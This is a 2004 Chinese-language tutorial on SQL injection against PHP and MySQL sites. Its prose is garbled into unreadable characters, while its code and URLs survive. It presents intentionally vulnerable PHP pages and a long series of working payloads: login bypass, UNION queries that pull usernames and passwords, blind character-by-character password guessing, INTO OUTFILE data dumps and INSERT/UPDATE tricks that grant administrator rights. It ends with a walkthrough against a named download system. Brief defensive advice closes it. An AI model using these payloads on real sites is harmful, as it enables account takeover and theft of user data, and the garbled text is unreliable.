SQL Injection with MySQL
ߣangelʣԭ
ڣ2004-09-16
Ѿڡڿͷߡ7¿תעд˺ܾãżĽҲָвٴµĵطλֿ˲ҪЦдڡAdvanced SQL Injection with MySQL֮ǰһ¡
ĽڽѧĿģΪɵĹ˸Ų𣬱дΪдݾԡʵʲô©ӭȫʹ̳http://www.4ngel.net/forumsҽ
ǰ
2003꿪ʼϲűԽԽ࣬оASPעҲҿĹSQLעһƪ99ĸдģڹѾ¯ˣڲſʼעɴ˿ڵⷽļڹһκܴ࣬˵ҶSQLע빥Ҳ൱Ϥˣڸվ㶼ЩƾƷΪһƪ£ҾûбҪ˵˵䶨ԭλѾﵽ¯ĵز̡ȨָСܡ
php+Mysqlע
ܿphp+Mysqlע¿ܱȽ٣עWEB©ͿԷ֣ʵЩ©ʵһӡڹоPHP˱оASPʵ̫࣬ԣûע⣬PHPİȫԱASPߺܶ࣬ºܶ˲Խż
ˣPHPվĽ죬SQLעЧ鷳һֹʽЧΪ70% ϵվSQL Injection©ڴְȫվ㣬鷳ΪMYSQL4µİ汾Dz֧ģҵphp.ini magic_quotes_gpc ΪOn ʱύıе ' (), " (˫), \ (б) and ַԶתΪзбߵתַעٵ谭
ڵʱݳĴ룬ҪûŵγЧĹеѣڵļѾŵӦijЩϡֻҪо飬ʵЧһҲѣɹҲܸߣҪ߳һ
עûо˵£Ǽmagic_quotes_gpcΪoff
php+Mysqlע
ܶΪPHP+MYSQLעһҪõţûа취MSSQLʹádeclare @a sysname select @a=<command> exec master.dbo.xp_cmdshell @aţʵǴҶעһ˵Ƕעʶϵһ
ΪʲôأΪʲôţ˫ַdzʹdirҲַѣִܵУдĴ룺
$command = "dir c:\";
system($command);
ַֻȻ˵ָϵͳ˵SQL䣬ҪǹSQLִУͲǵַôʲô»õţʲôʱأSQL䣺
SELECT * FROM article WHERE articleid='$id'
SELECT * FROM article WHERE articleid=$id
дڸֳжձ飬ȫDzͬģһڰѱ$idһԵУʹύıַʹȷSQL䣬ҲִУڶ䲻ͬûаѱŽУύһУֻҪոǿոıΪSQLִУӷֱύɹעĻ䣬֮ͬ
ָ$idΪ
1' and 1=2 union select * from user where userid=1/*
ʱSQLΪ
SELECT * FROM article WHERE articleid='1' and 1=2 union select * from user where userid=1/*'
ָ$idΪ
1 and 1=2 union select * from user where userid=1
ʱSQLΪ
SELECT * FROM article WHERE articleid=1 and 1=2 union select * from user where userid=1
ڵһеţDZȱպǰĵţʹΪSQLִУҪע͵ԭSQLеĺĵţſԳɹע룬php.inimagic_quotes_gpcΪon߱ǰʹaddslashes()ǵĹͻữΪУڶûŰҲÿȥպϡעֱͣύOKˡ
ҿһЩ¸ûаpinkeyesġphpעʵиǾSQL䣬ûаŵģҲҪΪĿԲע룬ϸPHPBBĴ룬ͿԷ֣Ǹ$forum_idڵSQLдģ
$sql = "SELECT *
FROM " . FORUMS_TABLE . "
WHERE forum_id = $forum_id";
ûõŰŸpinkeyesһлɳˣԴдPHPʱǵõŰѱȻҪİȫʩDZزٵġ
Ⱦһ˽һPHPµעԺԭȻҲԸߴѧϰЧSQL䡣
һû֤ӣȽһݿһݱһ¼£
CREATE TABLE `user` (
`userid` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default '',
`password` varchar(20) NOT NULL default '',
PRIMARY KEY (`userid`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;
#
# е `user`
#
INSERT INTO `user` VALUES (1, 'angel', 'mypass');
֤ûļĴ£
<?php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "injection";
mysql_connect($servername,$dbusername,$dbpassword) or die ("ݿʧ");
$sql = "SELECT * FROM user WHERE username='$username' AND password='$password'";
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
if (empty($userinfo))
{
echo "½ʧ";
} else {
echo "½ɹ";
}
echo "<p>SQL Query:$sql<p>";
?>
ʱύ
http://127.0.0.1/injection/user.php?username=angel' or 1=1
ͻ᷵أ
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in F:\www\injection\user.php on line 13
½ʧ
SQL Query:SELECT * FROM user WHERE username='angel' or 1=1' AND password=''
PHP Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in F:\www\injection\user.php on line 13
𣿵űպϺûע͵ĵţµûȷԣɴ˿֪ǹ䲻MysqlȷִУҪ¹죺
http://127.0.0.1/injection/user.php?username=angel' or '1=1
ʱʾ½ɹ˵ɹˡύ
http://127.0.0.1/injection/user.php?username=angel'/*
http://127.0.0.1/injection/user.php?username=angel'%23
ͰѺע͵ˣ˵˵ύIJ֮ͬύĵһ㣬ASPÿ˵Ƿdz㷺ģ˵˰ɣڶǸmysqlԣmysql֧/*#עʽύʱǰѺĴע͵ֵעڱ⣬IEַύ#ɿյģڵַύʱӦύ%23Ż#ͳɹעˣöˣɴ˿ԿPHPASPǿˡ
ͨӴӦöPHP+MYSQLעиԵʶ˰ɣ
乹
PHP+MYSQLעIJ֤ϵĹĹȤζĵطACCESSMSSQLͬͬԷӵ쾡¡ӡ
һ
һѵPHPģҲύַʾм¼ģʵΣҲΪûؼֽģѯĵطеļ¼ܶѯƾġ
ѯֻIJӦòݲƻãҪ̫ġй¶˽֪㲻Σһ棺
<form method="GET" action="search.php" name="search">
<input name="keywords" type="text" value="" size="15"> <input type="submit" value="Search">
</form>
<p><b>Search result</b></p>
<?php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "injection";
mysql_connect($servername,$dbusername,$dbpassword) or die ("ݿʧ");
$keywords = $_GET['keywords'];
if (!empty($keywords)) {
//$keywords = addslashes($keywords);
//$keywords = str_replace("_","\_",$keywords);
//$keywords = str_replace("%","\%",$keywords);
$sql = "SELECT * FROM ".$db_prefix."article WHERE title LIKE '%$keywords%' $search ORDER BY title DESC";
$result = mysql_db_query($dbname,$sql);
$tatol=mysql_num_rows($result);
echo "<p>SQL Query:$sql<p>";
if ($tatol <=0){
echo "The \"<b>$keywords</b>\" was not found in all the record.<p>\n";
} else {
while ($article=mysql_fetch_array($result)) {
echo "<li>".htmlspecialchars($article)."<p>\n";
} //while
}
} else {
echo "<b>Please enter some keywords.</b><p>\n";
}
?>
һдģȱ飬ǾͿԸдﵽע롱ĿģûΣ롰___ .__ %ƵĹؼʱݿем¼ȡڱύ
%' ORDER BY articleid/*
%' ORDER BY articleid#
__' ORDER BY articleid/*
__' ORDER BY articleid#
SQLͱıˣ
SELECT * FROM article WHERE title LIKE '%%' ORDER BY articleid/*%' ORDER BY title DESC
SELECT * FROM article WHERE title LIKE '%__' ORDER BY articleid#%' ORDER BY title DESC
ͻгм¼صģԸı˳ȻΣҲעһַʽ˰ɣ
ѯֶ
ѯֶֿԷֳ֣ѯͿѯֲѯACCESSMSSQL࣬ǿ㡣֪ΪʲôΪASPѣASPоʹõĸPHPҪССĸĶ£
ѯ
һSQL䣬̳Աעϵͳ鿴ûϵģ
<?php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "injection";
mysql_connect($servername,$dbusername,$dbpassword) or die ("ݿʧ");
$sql = "SELECT * FROM user WHERE username='$username'";
$result = mysql_db_query($dbname,$sql);
$row = mysql_fetch_array($result);
if (!$row) {
echo "ü¼";
echo "<p>SQL Query:$sql<p>";
exit;
}
echo "ҪѯûIDǣ$row\n";
echo "<p>SQL Query:$sql<p>";
?>
ύûΪʱͻûIDΪǷͻʾӦĴDzѯûϣǿԴ²ʹݱһûǵһijǵøղŵ֤𣿺ڵȣһAND£
SELECT * FROM user WHERE username='$username' AND password='$password'SELECT * FROM user WHERE username='$username'
ͬľǵΪʱͻȷʾϢǹAND֣ʹⲿΪ棬ǵĿҲʹﵽˣøղŽuserݿ⣬ûΪangelΪmypass
ӣӦ֪˰ɣύ
http://127.0.0.1/injection/user.php?username=angel' and password='mypass
ǾΪģΪύSQLӣ
SELECT * FROM user WHERE username='angel' AND password='mypass'
ʵʵĹУǿ϶֪ģ֪ݿĸֶΣǾͿʼ̽ˣȻȡ볤ȣ
http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6
ACCESSУLEN()ȡַȣMYSQLУҪʹLENGTH()ֻҪûйҲ˵SQLִУǷؽ֣ǷûIDǷءü¼ڡûΪangel볤Ϊ6ʱ棬ͻ᷵ؼ¼DzǺASPһLEFT()RIGHT()MID()룺
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,2)='my
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,3)='myp
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,4)='mypa
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,5)='mypas
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,6)='mypass
벻dz𣿼ɣȻʵвƣ滹ὲӵӦá
ѯ
ⲿ־ͺASPеˣһҪUNIONSQL䣬յľֶεMYSQLοֲᣬ֪ SELECT е select_expression (select_expression ʾϣ[ֶ]) гбͬ͡һ SELECT ѯʹõΪء˵ҲUNIONѡֶֶͶӦǰSELECTһңǰSELECTΪ棬ͬʱSELECTĽǰSELECTΪ٣ͻ᷵صڶSELECTõĽijЩ滻ڵһSELECTԭӦʾֶΣͼ
ͼֱ۶˰ɣӦ֪ǰѯݱĽṹDzѯݱֶͬҲͬǾͿύ:
SELECT * FROM article WHERE articleid='$id' UNION SELECT * FROM
ֶֶһֻܸͬͺֶύ
SELECT * FROM article WHERE articleid='$id' UNION SELECT 1,1,1,1,1,1,1 FROM
ͻᱨ
The used SELECT statements have a different number of columns
֪ͺֶ1ԣΪ1int\str\varֻͣҪıһԲµġۣкϸӡ
ǿݽṹһݱ
CREATE TABLE `article` (
`articleid` int(11) NOT NULL auto_increment,
`title` varchar(100) NOT NULL default '',
`content` text NOT NULL,
PRIMARY KEY (`articleid`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;
#
# е `article`
#
INSERT INTO `article` VALUES (1, 'һĺ', 'йĽƶҵҪʦͣ');
INSERT INTO `article` VALUES (2, 'Һ', 'Һˣʲô');
ֶͷֱintvarchartextUNIONϲѯʱIJѯıĽṹһͿáSELECT *κһһֻáSELECT 1,1,1,1ˡ
ļһܱʾµļܶվ㶼ҳûйˣԳΪԵע㣬ļΪӣʼǵעʵ顣
<?php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "injection";
mysql_connect($servername,$dbusername,$dbpassword) or die ("ݿʧ");
$sql = "SELECT * FROM article WHERE articleid='$id'";
$result = mysql_db_query($dbname,$sql);
$row = mysql_fetch_array($result);
if (!$row)
{
echo "ü¼";
echo "<p>SQL Query:$sql<p>";
exit;
}
echo "title<br>".$row."<p>\n";
echo "content<br>".$row."<p>\n";
echo "<p>SQL Query:$sql<p>";
?>
£ύһ
http://127.0.0.1/injection/show.php?id=1
ͻʾarticleidΪ1£DzҪ£ҪûϢҪѯuserDzѯղǽuser
$idûй˸ᣬҪshow.phpļеSQLдӣ
SELECT * FROM article WHERE articleid='$id' UNION SELECT * FROM user
еŰűģύ
http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user/*
˵ӦʾûusernamepasswordֶεݲŶôʾأͼ
ʵύarticleid=1articleڵģִнˣȻǰSELECTĽύյֵύһڵֵͻijҪĶ
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*
http://127.0.0.1/injection/show.php?id=99999' union select 1,username,password from user/*
ͼ
ھֶӦĵطʾҪݡ˼·ԼӦã滹ὲһЩļɡ
ļ
DZȽ쵫һƵļǾԿµSQL䣺
select * from table into outfile 'c:/file.txt'
select * from table into outfile '/var/www/file.txt'
䣬һڳ˭ԼݵأDZݣҲûмֱݷҪԼ죬ǰ
• 뵼ܷʵĿ¼ء
• ܷʵĿ¼ҪпдȨޣʧܡ
• ȷӲ㹻µݣټ
• ȷҪѾͬļᵼµʧܣʾFile 'c:/file.txt' already existsԷֹݿļ/etc/passwdƻ
Ǽuser.phpshow.phpļһһû½ʵ̫ˣԷϢܸӣֲдExploitҪµʲôʱΧģֱӵȫݺˡuser.phpļIJѯ䣬ǰinto outfileıʽעܵҪϢˣ
SELECT * FROM user WHERE username='$username' into outfile 'c:/file.txt'
֪ôʵǵĿģǾͺӦ䣺
http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt
˴ʾӷص俴ǵSQLȷʵעȷˣʹִҲDzѯˣļǹԹԵıˣͼ
ڴ뱾WHEREָһǵݽݣ뵼ȫأʵֻܼҪʹWHEREΪ٣ָһͿԲñWHEREˣ1=1ˣ
http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt
ʵʵSQLΪ
SELECT * FROM user WHERE username='' or 1=1 into outfile 'c:/file.txt'
usernameIJǿյģǼˣ1=1ԶģorǰWHEREͲˣǧandŶDzܵȫݵġ
Ȼ㣬¾ֱӵݣͼ
ǿĵļôأõUNIONϲѯһǰӦúUNIONһӦһ
SELECT * FROM article WHERE articleid='1' union select 1,username,password from user into outfile 'c:/user.txt'
ԵļˣҪύ
http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user into outfile 'c:/user.txt
ļdzˣһ⣬ǰIJѯarticleid='1'ΪˣԵҲµһ֣ͼ
ǰӦʹǰIJѯΪ٣ֻѯݣֻҪύ
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt
ܵõҪϣ
ֵעҪļmagic_quotes_gpcûдҳҲûõaddslashes()вܶԵκιˣΪύ·ʱһҪŰϵͳʶһ·Ҳóchar()ʲôͽ͡
INSERT
ΪMYSQLעSELECTʹشˣʵΣIJǾINSERTUPDATE䣬Ӳ࣬˵˵INSERTҪӦڸдݣֹ㷺ڵӣݽṹ
CREATE TABLE `user` (
`userid` INT NOT NULL AUTO_INCREMENT ,
`username` VARCHAR( 20 ) NOT NULL ,
`password` VARCHAR( 50 ) NOT NULL ,
`homepage` VARCHAR( 255 ) NOT NULL ,
`userlevel` INT DEFAULT '1' NOT NULL ,
PRIMARY KEY ( `userid` )
);
еuserlevelûĵȼ1ͨû2ͨԱ3dzԱһעĬעͨû£
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
ĬuserlevelֶDz1еıûо˾ֱдݿģ֪ʲô뷨ԣֱע룬ʹһעdzԱעʱ$homepageͿԴﵽдĿģָ$homepageΪ
http://4ngel.net', '3)#
ݿʱͱɣ
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3)#', '1');
עΪԱˡ÷Ҳһľԣ磬ûҪдıuserlevelֶݿĵһֶΣǰûеطע룬Ҳûа취ˡ
INSERTи㷺Ӧãҿоԭһġ
UPDATE
INSERTȣUPDATEӦøӹ㷺˲Ըдκݣøղŵע˵ݽṹҲ䣬ǿһûԼԼϣSQLһ㶼дģ
UPDATE user SET password='$password', homepage='$homepage' WHERE id='$id'
ûԼҳʲô뷨ܲڻȨްɣеSQLûиuserlevelֶΣôϰ취$homepage, ָ$homepageΪ
http://4ngel.net', userlevel='3
SQLͱ
UPDATE user SET password='mypass', homepage='http://4ngel.net', userlevel='3' WHERE id='$id'
DzֱɳԱˣuserlevelֶΣԼ
иӾģֱûϣǸղŵ䣬ΰȫһ㣬ʹMD5ܣ
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'
뱻ˣǻǿԹҪ䣬ָ$passwordΪ
mypass)' WHERE username='admin'#
ʱΪ
UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'
˸µҹĴDzڿ˵ǻûִаȻҲԴ$idָ֣$idΪ
' OR username='admin'
ʱΪ
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'
ҲԴﵽĵĿģ˵עǷdzļЩǴݿȡĹ̶ֵ$_SESSION['username']ȡϵSESSIONϢʱǾͿԭWHERE֮ǰԼWHEREע͵Ĵ룬ɴ˿ɼעҲעļ֮һЩɰע뷢ӵ쾡¡ò˵һ
ύʽGETPOSTύλÿǵַرıCOOKIEϢȣύķʽDZύύǹύֶͿˡ
Ӧ
1 ʹMYSQLú
ACCESSMSSQLеע룬кܶȽϸע뷽뵽ϵͳĵȣЩMYSQLҲܺܺõõӣʵMYSQLкܶúSQLͿʹעʱõϵͳϢмDZȽϳõģ
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
ľôҿԲMYSQLֲᣬUPDATE
UPDATE article SET title=$title WHERE articleid=1
ǿָ$titleΪϵĸΪûбŰԺȷִеģ
UPDATE article SET title=DATABASE() WHERE id=1
#ѵǰݿµtitleֶ
UPDATE article SET title=USER() WHERE id=1
#ѵǰ MySQL ûµtitleֶ
UPDATE article SET title=SYSTEM_USER() WHERE id=1
#ѵǰ MySQL ûµtitleֶ
UPDATE article SET title=SESSION_USER() WHERE id=1
#ѵǰ MySQL ûµtitleֶ
UPDATE article SET title=CURRENT_USER() WHERE id=1
#ѵǰỰ֤ƥûµtitleֶ
MYSQLõĺԻòõϢݿ汾֡ûǰݿȣǰѯӣύ
http://127.0.0.1/injection/show.php?id=1
Կһƪ£ô֪MYSQLݿϢأͬҲMYSQLúUNIONϲѯ֮¾ͼöˣԶȡļȻҪõUNIONͬҪUNIONֶ֪ͬݽṹֱӹ죺
http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()
ͿԷصǰݿݿ汾DZȽġ
渽һҺSuper•HeiдĴ룬ַתΪASCII롣лṩ
#!/usr/bin/perl
#cody by Super•Hei
#to angel
#C:\>test.pl c:\boot.ini
#99,58,92,98,111,111,116,46,105,110,105
$ARGC = @ARGV;
if ($ARGC != 1) {
print "Usage: $0 \n";
exit(1);
}
$path=shift;
@char = unpack('C*', $path);
$asc=join(",",@char);
print $asc;
2ӵע
עǼmagic_quotes_gpcΪonˡ
֪εDzҪģַҪţԱܶ⡣ݣûа취עģҪǹתͣҪõCHAR()ASCII(),ORD(),CONV()Щˣٸӣ
SELECT * FROM user WHERE username='angel'
ʹ$usernameأܼύͿˡ
SELECT * FROM user WHERE username=char(97,110,103,101,108)
# char(97,110,103,101,108) ൱angelʮơ
SELECT * FROM user WHERE username=0x616E67656C
# 0x616E67656C ൱angelʮơ
ԼȥԺˣǰ˵ģǿԹı壬ȻDzܹʲôַֻӲãǰ(user,php)ǰѲѯΪuserid
SELECT * FROM user WHERE userid=userid
ģύ
http://127.0.0.1/injection/user.php?userid=1
ͿԲѯuseridΪ1ûϣΪ1֣ûŶνǹ죺
http://127.0.0.1/injection/user.php?userid=1 and password=mypass
ԴΪmypassַύ
http://127.0.0.1/injection/user.php?userid=1 and password='mypass'
magic_quotes_gpcĹϵǾԲܵġŻ/'ʲô취Щַ𣿾CHAR()ύ
http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)
أʵ֤CHAR()ǿеģǾͰCHAR()ýLEFTλ½⣡
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)=char(109)
أ˵useridΪ1ûpasswordֶεһλchar(109)Ǽ£
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,2)=char(109,121)
أ˵ȷӰ쵽ЧʣȻΣȫñȽȽϣ
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100)
Ȼʵchar()ȷһΧܿͿԲ³˺ʱǿñȽȽϣ
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,3)>char(109,121,111)
ԭѾºõIJøıˣܿͿԲ꣺
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,6)=char(109,121,112,97,115,115)
Ȼmysql>ʾ»phpMyadminִУ
select char(109,121,112,97,115,115)
ͻ᷵أmypass
ȻҲʹSUBSTRING(str,pos,len)MID(str,pos,len)ַ str pos λ len ַӴACCESSһġǸղŵӣDzpasswordֶεĵλλԣλpλa죺
http://127.0.0.1/injection/user.php?userid=1 and mid(password,3,1)=char(112)
http://127.0.0.1/injection/user.php?userid=1 and mid(password,4,1)=char(97)
ҪĽͱųˡȻ鷳øİ취ord()ÿȥ鿴MYSQLοֲᣬúص͵ݣñȽбȽϡȻóĽҲͿˣҲύ
http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111
http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))<113
http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))=112
Ǿ͵óˣȻchar()ԭͺˡຯҿԼȥ飬ƪҲ˵ˡ
3ȷδ֪ݽṹֶμ
ݽṹUNIONϲѯҸߴһСɣҲǷdz÷dzҪļɣַUNIONԡ
ǰshow.phpļӣǿxxx.php?id=xxxURLʱҪUNIONҪ֪xxx.phpѯݱĽṹǿύȷжٸֶΣ
http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1
жٸ1ͱʾжٸֶΣԣֶͬͿ϶ֶ¶ˣͿ϶᷵ȷҳ棬ֶˣͿʼжͣʵҲףüĸ1magic_quotes_gpcDzţϰ취char()char(97)ʾĸa£
http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97)
ַǾͻʾaַıҲ˵λΣͻ᷵ء0ͼ
жҪʲô飬ǰһֱ˵ҪḻܸõȷжϣΪĴǧģֻǾٸӣھԣԼдԼԵġ졣ϣʵսУע𣬲ҪհᣬòǸ
4ݱ
ڿȷδ֪ݽṹֶμ͵ĻϣֿԽһķݽṹǾDz±ʵʹUNIONϲѯʱܺIJѯôΡֻҪûϵ⣬ȷأҲ˵ǿĻϣһµˣղύ
http://127.0.0.1/injection/show.php?id=1 union select 1,1,1
ݣ˵ļѯıǴ3ֶεģȻںfrom table_nameҲ
http://127.0.0.1/injection/show.php?id=1 union select 1,1,1 from members
http://127.0.0.1/injection/show.php?id=1 union select 1,1,1 from admin
http://127.0.0.1/injection/show.php?id=1 union select 1,1,1 from user
Ǵڵģôͬ᷵ӦʾݣڣȻͻˣҵ˼·Ȼ©ļѯݽṹȷٽһѯֹûЧʵģһӾͿԲѯˣڲwww.***bai.netʵ漰
һ⣬ںܶ£ܶݱһǰǰͿöһݿ⡣磺
site_article
site_user
site_download
forum_user
forum_post
ȫʶߵĻԱӸǰDz½ͺ鷳ˣȫһбܡͲ˵ˣһһã^_^
ʵ
һڷdzվĹԣ֪ʶһδŵ֤ӰأdzվΪHB(www.***bai.net)HBʹõҹèϵͳϵͳϵͳѾˣǾͲˣϵͳǾģдµĵԲͬϵͳڱؽһģIJԡʵϣǰøݶļHB
ҵļshow.php?id=1ϿݽṹͱHBûиֶκͱ֪ҹèϵͳ1.0.1Ϣı19ֶΣύ
http://127.0.0.1/ymdown/show.php?id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
ע⣬191ҳ棬ҿԿԿ϶ֶûб䣬ҲͱˣֱӿҹèĬûݱǷڣ
http://127.0.0.1/ymdown/show.php?id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user
أͼURLԿ
ţHBǹģôõijҲ֪һãҲǣûж˺һȥӹ̳õģٿĬϵûidڲڣ
http://127.0.0.1/ymdown/show.php?id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
ˣ㲻idΪ1ûǰIJѯģݿϢֻǰIJѯΪ٣ʹѯĽʾҪעһ㣬show.phpļһδ룺
if ($id > "0" && $id < "999999999" ):
//ȷִеĴ
else:
echo "<p><center><a href=./list.php>¼</a></p>\n";
Ҳ˵ǵIDֵôҲ0999999999֮⣬HB϶ᳬ10000ģǾύ
http://127.0.0.1/ymdown/show.php?id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
ˣȫǡ1˵IDŶڵĻҳֻصȫDz꣬ΪжΪվʾꡣȷIDںҪȷDzǹԱа
http://127.0.0.1/ymdown/show.php?id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1
涨groupidΪ1dzԱȻȷϢˣǾֱӹ䣬Ҫû룬ٺ٣ȿymdownݽṹΪshow.phpDzѯģӦÿݽṹ
CREATE TABLE ymdown (
id int(10) unsigned NOT NULL auto_increment,
name varchar(100) NOT NULL,
updatetime varchar(20) NOT NULL,
size varchar(100) NOT NULL,
empower varchar(100) NOT NULL,
os varchar(100) NOT NULL,
grade smallint(6) DEFAULT '0' NOT NULL,
viewnum int(10) DEFAULT '0' NOT NULL,
downnum int(10) DEFAULT '0' NOT NULL,
homepage varchar(100), demo varchar(100),
brief mediumtext, img varchar(100),
sort2id smallint(6) DEFAULT '0' NOT NULL,
down1 varchar(100) NOT NULL,
down2 varchar(100),
down3 varchar(100),
down4 varchar(100),
down5 varchar(100),
PRIMARY KEY (id)
);
ûͶvarcharҪѡymdownvarcharvarcharдintĵطȻDzʾˣupdatetimeڣij20ܻʾȫǾͰûʾname⣩ʾsizeļСˣ191Уnamesizeֱǵڶ͵ĸύ
http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
ɹҪû룬ͼ
֤Խ
̾ͽˣںڰװڸˣ½ǽע룬ĿѾﵽˣûбҪ̨ˣҺּSQL֤ǻȡǷȷύ
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49
#֤һλ
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50
#֤ڶλ
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51
#֤λ
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,4,1))=52
#֤λ
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,5,1))=53
#֤λ
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,6,1))=54
#֤λ
select char(49,50,51,52,53,54)ͿԵõ123456
OKԽ֤ǵĽûд˵һ£뱾123456Բord()ֱӲ£Ϊ˴ܿһḶ́һǡרҵһˡ油һͼDZд²HBʱȡģ
עķ
Դ֣һǷǴ뱾ܷõºܶˣǾǰmagic_quotes_gpcΪOndisplay_errorsΪOffҲͲڶ˵ȻĽӴdz⣬ǻǴӳѰԭ
˵phpaspãȫõĺͿֳεıֻʹһintval()ɽ⣬ִвѯ֮ǰȴһ±ӾǺܰȫˣ
$id = intval($id);
mysql_query("SELECT * FROM article WHERE articleid='$id'");
д
mysql_query("SELECT * FROM article WHERE articleid=".intval($id)."")
ι죬ջǻתΪβ·ݿġܶͳдdzࡣ
ַεıҲaddslashes()úˣúmagic_quotes_gpcһʹúе ' (), " (˫), \ (б) and ַԶתΪзбߵַ°汾phpmagic_quotes_gpcˣʹaddslashes()ҲгͻԷʹá£
$username = addslashes($username);
mysql_query("SELECT * FROM members WHERE userid='$username'");
д
mysql_query("SELECT * FROM members WHERE userid=".addslashes($username)."")
ʹaddslashes()ԱԴ֡ղŵǰֱӰѡ_%תΪ\_\%ͿˣȻҲҪʹaddslashes()£
$keywords = addslashes($keywords);
$keywords = str_replace("_","\_",$keywords);
$keywords = str_replace("%","\%",$keywords);
ASPһҪдһѵĴ룬һ룬ǾͿѱеˣDzǺܼ㣿
ƪ20043·ÿʱѧϰоģ5Ѯд꣬жǾԲԵģĽǼܽɣкܶ༼ѵûнģ˴©ģӭָ
вΣԼߵĶֻҪһ㶼ԽǵԺ㷺ԣҲûдҸ˹ƣýPHP+MYSQLעһϵйߣҲռ߷չҽһҪŪԭֻֻ꣬Чʰˣļ߳
ҿƪµʱѾ߿ˣһдһƪо
Ϊø˽ⲢPHP+MYSQLע뼼Ҳдƪ£һΡҪκιҵκκϷƻԸ
طdz
һж
ԽԽӽԱ
Ǵͬͬ
ҳ:
[1]